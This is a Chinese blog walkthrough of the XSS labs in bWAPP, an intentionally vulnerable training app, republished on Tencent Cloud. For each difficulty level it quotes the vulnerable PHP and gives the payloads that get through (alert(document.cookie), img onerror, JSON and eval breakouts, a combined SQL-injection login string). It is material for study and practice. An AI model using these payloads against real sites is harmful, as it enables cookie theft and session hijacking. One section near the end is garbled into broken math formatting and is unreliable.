前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >bwappxss_α·pav

bwappxss_α·pav

作者头像
全栈程序员站长
发布2022-09-29 10:46:18
1K0
发布2022-09-29 10:46:18
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

XSS注入

基础知识

xss

演练

反射型

GET/POST型

low
代码语言:javascript
复制
<script>alert('XSS')</script>
//<script>alert(007)</script>
//<script>alert(document.cookie)</script>
mid
代码语言:javascript
复制
// 字符 ' " \ 为转义为 \' \" \\
function xss_check_4($data)
{ 
   
    // These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).
    return addslashes($data);
}
代码语言:javascript
复制
<script>alert('XSS')</script> //报错
<script>alert(/XSS/)</script>  //成功
//在javascript 中 / 和 " 可起到一样的作用 
//<script>alert(007)</script> //成功
//<script>alert(document.cookie)</script> //成功
high
代码语言:javascript
复制
//特殊被转义为HTML实体,无法绕过
function xss_check_3($data, $encoding = "UTF-8")
{ 
   

    // htmlspecialchars - converts special characters to HTML entities 
    // '&' (ampersand) becomes '&amp;' 
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;' 
    return htmlspecialchars($data, ENT_QUOTES, $encoding);
       
}

JSON反射

low
代码分析

关键代码如下

通过URL获得字段$title,并在数组中查询,如果找不到就返回JSON数据。

通过JSON.parse()J将数据转换为 JavaScript 对象

故可控制$title值对<script>进行闭合

代码语言:javascript
复制
if(! in_array(strtoupper($title), $movies)){ 
   
	$string = '{"movies":[{"response":"' . $title . '??? Sorry, we don&#039;t have that movie :("}]}';
}

<script>
		var JSONResponseString = '<?php echo $string ?>';
     	// var JSONResponse = eval ("(" + JSONResponseString + ")");
        var JSONResponse = JSON.parse(JSONResponseString);
        document.getElementById("result").innerHTML=JSONResponse.movies[0].response;
</script>
代码语言:javascript
复制
"}]}';alert(document.cookie)</script>

//"}]}';</script><script>alert(document.cookie)</script>

//<script>
// var JSONResponseString = '<?php echo $string ?>';
//变为
//<script>
// var JSONResponseString = '{"movies":[{"response":""}]}';alert(document.cookie) </script>
mid/high

使用 htmlspecialchars()函数把特殊字符(& ’ ” < >)转义为HTML实体无法桡过

AJAX反射

low/mid
代码语言:javascript
复制
<img src=x onerror=alert(document.cookie)>
//<svg οnlοad=alert(document.cookie)>
high

使用 htmlspecialchars()函数把特殊字符(& ’ ” < >)转义为HTML实体无法桡过

XML反射

low/mid

在XML解析payload需要注意<>两个字符需要使用HTML实体编码

代码语言:javascript
复制
&lt;img src=x onerror=alert(document.cookie)&gt;
high

使用 htmlspecialchars()函数把特殊字符(& ’ ” < >)转义为HTML实体无法桡过

Referer 注入

代码分析
代码语言:javascript
复制
<div id="main">
    
    <h1>XSS - Reflected (Back Button)</h1>
    
    <p>Click the button to go to back to the previous page:

    <input type=button value="Go back" onClick="document.location.href='<?php echo isset($_SERVER["HTTP_REFERER"]) ? xss($_SERVER["HTTP_REFERER"]) : ""?>'">
    
    </p>

</div>

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rBrPPfy4-1609946435939)(bWAPP-XSS/image-20201006183234683.png)]

对onClick进行适当闭合即可

low
代码语言:javascript
复制
"><script>alert(document.cookie)</script>

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FOSCpeVv-1609946435942)(bWAPP-XSS/image-20201006183413428.png)]

mid
代码语言:javascript
复制
"><script>alert(document.cookie)</script>

此处使用addslashes()函数导致"><script>alert("XSS")</script>但是 "><script>alert(document.cookie)</script>却可以绕过,可见 >之前的 "不受影响

high

无法绕过

Header注入

代码分析
代码语言:javascript
复制
<div id="main">

    <h1>XSS - Reflected (Custom Header)</h1>

    <p>Some web clients use custom HTTP request headers...</p>

    <p>

    Content of our <b>bWAPP</b> header:
<?php foreach(getallheaders() as $name => $value) { if($name == "bWAPP") //如果存在名为bWAPP的请求头,就读取请求头内容 { echo "<i>" . xss($value) ."</i>"; } } ?>
    </p>
</div>
low
代码语言:javascript
复制
bWAPP: <script>alert(document.cookie)</script>

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AmHdTSVq-1609946435944)(bWAPP-XSS/image-20201006185758145.png)]

mid

只要payload中不出现 ' " \,均可绕过

代码语言:javascript
复制
bWAPP: <script>alert(document.cookie)</script>
high

无法绕过

eval注入

代码分析
代码语言:javascript
复制
<script>
    eval("document.write(<?php echo xss($_GET["date"])?>)");
</script>

更改url参数,进行注入

可利用 document.write()直接执行alert(),或对eval()进行闭合

low
代码语言:javascript
复制
alert(document.cookie)

//)");alert(document.cookie)</script>
mid
代码语言:javascript
复制
eval(String.fromCharCode(97,108,101,114,116,40,47,120,115,115,47,41))

//eval(alert(/xss/))

JavaScript eval() 函数

JavaScript fromCharCode() 方法

high

写死了,只要不是Date()函数就报错,无法绕过

代码语言:javascript
复制
 <?php
    if(isset($_GET["date"]))
    { 
       
        if($_COOKIE["security_level"] == "2")
        { 
   
            if($_GET["date"] != "Date()")
            { 
    
                echo "<p><font color=\"red\">Invalid input detected!</font></p>";     

            }}}         
    ?>

HREF注入

代码分析
代码语言:javascript
复制
<td align="center"> <a href=xss_href-3.php?movie=<?php echo $row["id"]; ?>&name=<?php echo hpp($name);?>&action=vote>Vote</a></td>

通过对 $name的控制,实现绕过

low
代码语言:javascript
复制
name=?><img src=x onerror=alert(document.cookie)><?php&action=vote
mid/high

使用 urlencode()进行url编码,无法绕过

Login form注入

代码分析
代码语言:javascript
复制
$sql = "SELECT * FROM heroes WHERE login = '" . $login . "' AND password = '" . $password . "'";

通过sql注入和xss联合使用

low
代码语言:javascript
复制
' or 1=1 "<script>alert(document.cookie)</script>"
mid/high

无法绕过

PHP_SELF 注入

代码分析
代码语言:javascript
复制
<?php
if(isset($_GET["form"]) && isset($_GET["firstname"]) && isset($_GET["lastname"]))
{ 
   
$firstname = $_GET["firstname"];
$lastname = $_GET["lastname"];    
if($firstname == "" or $lastname == "")
{ 

echo "<font color=\"red\">Please enter both fields...</font>";       
}
else            
{ 
 
echo "Welcome " . xss($firstname) . " " . xss($lastname);   
}
}
?>

对用户输入内容进行输出。(类似留言板)

low
代码语言:javascript
复制
<script>alert(document.cookie)</script>
mid

不出现 ' " \ 即可

代码语言:javascript
复制
<script>alert(document.cookie)</script>
high

无法绕过

请求头Referer注入

代码分析
代码语言:javascript
复制
<?php
if(isset($_SERVER["HTTP_REFERER"])) 
{ 
   
// print_r($_SERVER);
$referer = $_SERVER["HTTP_REFERER"];
echo "<p>The referer: <i>" . xss($referer) . "</i></p>"
}
else     
{ 

echo "<p><font color=\"red\">No referer was used!</font></p>";   
}
?>

与留言版类似,注入点在 Referer 字段

low
代码语言:javascript
复制
<script>alert(document.cookie)</script>
mid

不出现 ' " \ 即可

代码语言:javascript
复制
<script>alert(document.cookie)</script>
high

无法绕过

请求头User-Agent注入

代码分析
代码语言:javascript
复制
<?php
if(isset($_SERVER["HTTP_USER_AGENT"]))
{ 

// print_r($_SERVER);
$user_agent = $_SERVER["HTTP_USER_AGENT"];
echo "<p>Your User-Agent: <i>" . xss($user_agent) . "</i></p>";
}
else
{ 

echo "<p><font color=\"red\">No User-Agent was used!</font></p>";
}
?>
low
代码语言:javascript
复制
<script>alert(document.cookie)</script>
mid

不出现 ' " \ 即可

代码语言:javascript
复制
<script>alert(document.cookie)</script>
high

无法绕过

存储型

blog

代码分析
代码语言:javascript
复制
<tr height="40">
<td align="center"><?php echo $row->id; ?></td>
<td><?php echo $row->owner; ?></td>
<td><?php echo $row->date; ?></td>
<td><?php echo $row->entry; ?></td> <!--根据不同的security_level对$row->entry进行消毒-->
</tr>
low
代码语言:javascript
复制
<script>alert(document.cookie)</script>
mid

不出现 ' " \ 即可

代码语言:javascript
复制
<script>alert(document.cookie)</script>
high

无法绕过

Change Secret(HTML hidden)注入

代码分析
代码语言:javascript
复制
//low 对提交的$login和$secret都进行了严格的消毒
$login = mysqli_real_escape_string($link, $login);
$secret = mysqli_real_escape_string($link, $secret);
$secret = xss($secret);
//mid high对提交的$secret都进行了严格的消毒
$secret = mysqli_real_escape_string($link, $secret);
$secret = htmlspecialchars($secret, ENT_QUOTES, "UTF-8");

故无法直接对 secret进行注入

low
代码语言:javascript
复制
"><script>alert(document.cookie)</script>
mid/high

l o g i n 和 login和 login和secret都进行了严格的消毒 l o g i n = m y s q l i r e a l e s c a p e s t r i n g ( login = mysqli_real_escape_string( login=mysqlir​eale​scapes​tring(link, login); s e c r e t = m y s q l i r e a l e s c a p e s t r i n g ( secret = mysqli_real_escape_string( secret=mysqlir​eale​scapes​tring(link, secret); s e c r e t = x s s ( secret = xss( secret=xss(secret);

//mid high对提交的secret都进行了严格的消毒 s e c r e t = m y s q l i r e a l e s c a p e s t r i n g ( secret = mysqli_real_escape_string( secret=mysqlir​eale​scapes​tring(link, secret); s e c r e t = h t m l s p e c i a l c h a r s ( secret = htmlspecialchars( secret=htmlspecialchars(secret, ENT_QUOTES, “UTF-8”);

代码语言:javascript
复制
故无法直接对 `secret`进行注入
#### low
```javascript
"><script>alert(document.cookie)</script>
mid/high

无法绕过

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/193627.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年9月15日 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • XSS注入
    • 基础知识
    • 演练
      • 反射型
        • GET/POST型
        • JSON反射
        • AJAX反射
        • XML反射
        • Referer 注入
        • Header注入
        • eval注入
        • HREF注入
        • Login form注入
        • PHP_SELF 注入
        • 请求头Referer注入
        • 请求头User-Agent注入
      • 存储型
        • blog
        • Change Secret(HTML hidden)注入
    相关产品与服务
    腾讯云代码分析
    腾讯云代码分析(内部代号CodeDog)是集众多代码分析工具的云原生、分布式、高性能的代码综合分析跟踪管理平台,其主要功能是持续跟踪分析代码,观测项目代码质量,支撑团队传承代码文化。
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档